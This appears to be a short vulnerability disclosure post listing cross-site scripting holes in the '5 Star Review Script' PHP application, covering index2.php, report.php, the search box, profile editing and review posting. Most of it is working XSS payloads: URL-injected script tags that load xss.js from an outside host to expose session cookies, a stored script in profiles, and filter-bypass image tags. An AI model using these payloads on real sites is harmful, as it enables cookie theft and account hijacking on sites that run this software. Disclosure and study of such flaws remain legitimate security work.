5 Star Review - review-script.com - XSS w/ cookie output
5 Star Review Script
Homepage:
http://www.review-script.com/
Effected files:
index2.php
report.php
search box
editing your profile
posting a review.
----------------------------------
index2.php XSS Vuln with cookie disclosure:
By ending quotes and using a few closing and opening tags before and after, we
can insertour script code and produce
this vulnerability.
http://www.example.com/index2.php?pg=2&item_id=11&sort=review.id'>">'><SCRIPT%20SRC=http://www.youfucktard.
com/xss.js></SCRIPT><"<"<"<"&order=DESC&PHPSESSID=91c137efddf8844a26f5c57a8ca2d57d
Screenshots:
http://www.youfucktard.com/xsp/5star1.jpg
http://www.youfucktard.com/xsp/5star2.jpg
Aftering clicking the "Email a friend this link" we notice our text partyl is
still on the screen aswell, dueto the cookie.
Screenshots:
http://www.youfucktard.com/xsp/5star3.jpg
--------------------------------------
report.php XSS Vuln same as above:
http://www.example.com/report.php?id=970&item_id=251'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<"
Again, the cookie data is output on our screen.
--------------------------------------
search_reviews.php XSS Vuln:
One way to achive this XSS example would be to use long UTF-8 Unicode encoding
without semicolons. For PoC try
putting this in the search box:
'>">'<IMG
SRC=javascript:alert('XSS')><"<"<"<"
Now, if we try touse
'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<" Like
the previous results, we get a screen spammed full of "javascript is not
allowed" which goes all the way across, and down several
screens.
Screenshot:
http://www.youfucktard.com/xsp/5star4.jpg
---------------------------------------------
Editing your profile XSS Vuln:
For aPoC try using no filtering at all:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/5star5.jpg
http://www.youfucktard.com/xsp/5star6.jpg
------------------------------------------
When posting a review, theres many ways to bypass the filters they use. The way
I used in thisscreenshot was to put a
tab between jav ascript. For aPoC make sure tabs on and enter:
<IMG SRC="jav ascript:alert('XSS');">
Screenshots:
http://www.youfucktard.com/xsp/5star7.jpg
http://www.youfucktard.com/xsp/5star8.jpg
-----------------------------------------------